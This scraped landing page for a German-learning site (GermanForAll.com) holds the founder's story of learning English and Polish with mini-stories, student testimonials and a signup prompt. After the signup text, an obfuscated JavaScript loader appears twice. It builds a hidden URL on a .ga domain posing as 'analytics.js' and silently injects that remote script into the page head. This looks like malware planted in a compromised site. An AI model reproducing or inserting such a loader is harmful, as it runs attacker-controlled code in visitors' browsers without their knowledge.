Ich bringe dir bei, fließend Deutsch zu sprechen

Ich bin auf einer Mission

Ich verkaufe nicht nur einen weiteren Kurs, um Deutsch zu lernen.

Ich verkaufe Erfahrungen, die dein Leben verändern werden.

Cathi motivated me not to give up

brian_canada

I really want to study in Berlin, but I was about to give up because the German language was too hard. Luckily I met Cathi and she motivated me to try the Mini-Story Method. That was my breakthrough! Now I like German so much!

Brian - Canada

Everyone will enjoy learning with her

Mana-from-Iran

At first, I did not know German, and then I asked Cathi for help. She accepted with passion and talked about herself. She enjoyed teaching the German language to me and to others. She does the best with patience so everyone will enjoy learning with her.

Mana - Iran

Hallo, ich bin Cathi, deutscher Muttersprachler und Gründerin von GermanForAll.com

Cathrin Kilian

Ende 2018 wurde mir ein Traum-Job angeboten. Aber es war ein internationales Projekt und ich musste fließend Englisch sprechen. Puh, das war eine Herausforderung!

Mein Englisch war mittelmäßig, ich konnte geschriebene Texte verstehen, ich konnte gesprochenes Englisch einigermaßen verstehen, aber ich traute mich nicht zu sprechen. Ich schämte mich für meinen deutschen Akzent und oft fand ich nicht die passenden Worte oder sie fielen mir erst Stunden später ein, als es zu spät für ein gutes Argument war.

Die Vorhaben sollte zwei Monate nach meinem Interview beginnen, aber sie wollten nicht nur, dass ich fließend Englisch spreche, sondern sagten mir, es wäre noch besser, wenn ich Polnisch sprechen könnte (weil möglicherweise Polen dabei wären, die nicht so gut mit Englisch oder Deutsch seien).

Ich hatte ehrlich gesagt keine Ahnung, wie ich in nur zwei Monaten fließend Englisch sprechen sollte (von Polnisch ganz zu schweigen), aber ich war fest entschlossen, einen Weg zu finden, um diesen faszinierenden Job zu bekommen und eine Arbeit zu machen, die ich wirklich liebte.

Ich musste mein Englisch schnell verbessern und es gelang mit mit einer Methode, von der ich noch nie zuvor gehört hatte.

Welches ist der einfachste Weg, Deutsch zu lernen?

Nach jahrelangem Erlernen einer Fremdsprache in der Schule haben die meisten Menschen trotzdem Schwierigkeiten, diese Sprache zu verstehen oder sogar leicht zu sprechen. Ihr Vokabular mag umfangreich sein, aber es ist immer noch schwierig für sie, diese Sprache gut zu verwenden.

Ich war genau dort und ich dachte, es kann immer eine bessere Lösung geben.

Nun, nur weil eine Methode seit Hunderten von Jahren in der Schule angewandt wird, ist sie nicht unbedingt die beste (oder wenigstens eine gute).

Wenn du jemals dachtest, du könntest zu dumm sein, um Deutsch oder eine andere Sprache zu lernen, lass mich dir sagen, dass dies nicht stimmt!

Glaube mir, du bist klug genug, um eine neue Sprache zu lernen - jeder ist es - sie haben dich nur auf die falsche Weise unterrichtet!

Wusstest du, dass du längst mit der einfachsten Methode, eine Sprache zu lernen, vertraut bist?

Ja, du hast sie genutzt, um deine Muttersprache zu lernen.

Ich habe eine Methode entdeckt, mit der man selbstsicher Englisch sprechen kann, die überraschend einfach ist. Und ich habe keine extra Zeit gebraucht!

Nach nur fünf Tagen hielt ich eine Rede vor einem imaginären Publikum, das in meiner Küche saß. Am nächsten Morgen erwachte ich mit englischen Wörtern im Kopf.

Das war beeindruckend!

Ich habe mit A.J. Hoge's Frage-und-Antwort Kurzgeschichten geübt, Englisch zu sprechen (effortlessenglishclub.com). A.J. ist ein erfahrener Englischlehrer, der Menschen dabei hilft, fließend Englisch zu sprechen.

Zum ersten Mal in meinem Leben habe ich mit viel Spaß Sprachen gelernt!

Ermutigt durch meinen schnellen Erfolg begann ich auf dieselbe Weise Polnisch zu lernen (mithilfe von Frage-und-Antwort Kurzgeschichten, bereitgestellt von Piotr von realpolish.pl).

Ich lernte ohne zusätzliche Zeit, aber mit schnellen Fortschritten.

Es war so unglaublich einfach!

Am meisten habe ich es genossen, auf Englisch und sogar Polnisch mit Menschen auf der ganzen Welt zu sprechen.

germanforall_logo

So wurde GermandForAll geboren und ich freue mich, dich hier zu treffen.

Es liegt auf der Hand, dass ich nicht die Einzige bin, der mit den alten Methoden beim Sprachenlernen kaum voran kam.

Als Piotr mir sagte, dass er gerne Deutsch lernen würde, aber kein passendes Material fand, konnte ich nicht anders, als einige deutsche Frage-und-Antwort-Geschichten zu schreiben.

Ich schickte meine Kurzgeschichten an meine Tandem-Partner und andere Deutsch Schüler. Sie schrieben mir, dass es jetzt viel einfacher für sie geworden sei, Deutsch zu lernen.

Es wurde meine LEIDENSCHAFT, noch mehr Menschen dabei zu helfen, ihr Ziel zu erreichen und Deutsch mühelos zu meistern.

Meine Aussprache hat sich sehr schnell verbessert

Wolfgang-from-Togo

Zum Deutsch lernen sind die Mini-Stories super. Ich höre sie jeden Tag und spreche mit. Meine Aussprache hat sich sehr schnell verbessert und insgesamt mein Deutsch. Ich studiere in Togo Germanistik und ich will in Deutschland den Master machen. Cathi's Mini-Stories sind eine tolle Hilfe, mein Deutsch zu verbessern.

Wolfgang - Togo

Für mich funktioniert es sehr gut. Großartige Arbeit!

Ayyubi from Indonesia

Ich habe gerade angefangen, Deutsch mit Cathi zu lernen und die “Mini Story Method” zu verwenden. Ich denke, dass diese Methode sehr hilfreich ist. Ich glaube, dass wir leicht neue Sprachen lernen können, wenn wir eine Geschichte verstehen und versuchen zuzuhören und zu sprechen.


Für mich funktioniert es sehr gut. Groβartige Arbeit!

Ayyubi - Indonesia

Ein bisschen Privates: Wer ist Cathi?

Cathrin Kilian

Wenn es ein Wort gäbe, das mich beschreiben könnte, wäre es: Neukreambilei (neugierig, kreativ, ambitioniert, leidenschaftlich).

Als achtjähriges Mädchen nahm ich meinen Wecker und die Kaffeemaschine meiner Eltern auseinander, um herauszufinden, wie diese Dinge funktionieren.

Während ich die Kaffeemaschine wieder zusammenbauen konnte, zerbrach der Wecker in hundert kleine Teile und ich musste beichten ... aber ich hatte einige hübsche kleine Zahnräder, mit denen ich spielen konnte. 😉

Während ich aufwuchs, lernte ich die Dinge eher durch Nachdenken und Ausprobieren, als durch Zerstören zu erkunden, aber ich habe nie meine Neugier und Leidenschaft verloren zu lernen und zu "basteln".

Ich liebe Theater spielen und segeln gehen. Ich liebe Lagerfeuer in der Nacht und eine Kanne heißen, starken Kaffee im Morgengrauen. Ich liebe Montage genauso wie Sonntage.

Und ich liebe es, zu lehren!

Ich LIEBE es, Menschen auf der ganzen Welt meine schöne Muttersprache DEUTSCH beizubringen.​​​​

Ich BRENNE dafür, fesselnde Mini-Stories und andere coole Tools zu erstellen, die dir helfen, Deutsch zu lernen.

Ich bin fest ENTSCHLOSSEN, all dies in bester Qualität und mit meiner besten Stimme aufzunehmen (die laut meinen Schülern reizend, erzählerisch und alles andere als langweilig ist).

Also lass uns zusammen SPASS haben!

Und hey, danke, dass du hier bist. Ich schätze das sehr ... und dich.

Jetzt bist du dran, Freund der deutschen Sprache ...

Es ist an der Zeit, dass du erfolgreich bist und fließend Deutsch sprechen kannst.

Bevor ich dich meine Website erkunden lasse, möchte ich dich einladen, eine Entscheidung zu treffen.

Geh einen neuen Weg

Klick auf diesen Button, wenn du KOSTENLOSE Mini-Stories hören willst, um mühelos Deutsch zu sprechen.

>
cathrinkilian

Hi, Ich bin Cathi, Deutscher Muttersprachler.

Melde dich an und erhalte KOSTENLOSE  Kurzgeschichten und 7 SCHLÜSSEL für erfolgreichen Spracherwerb

var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();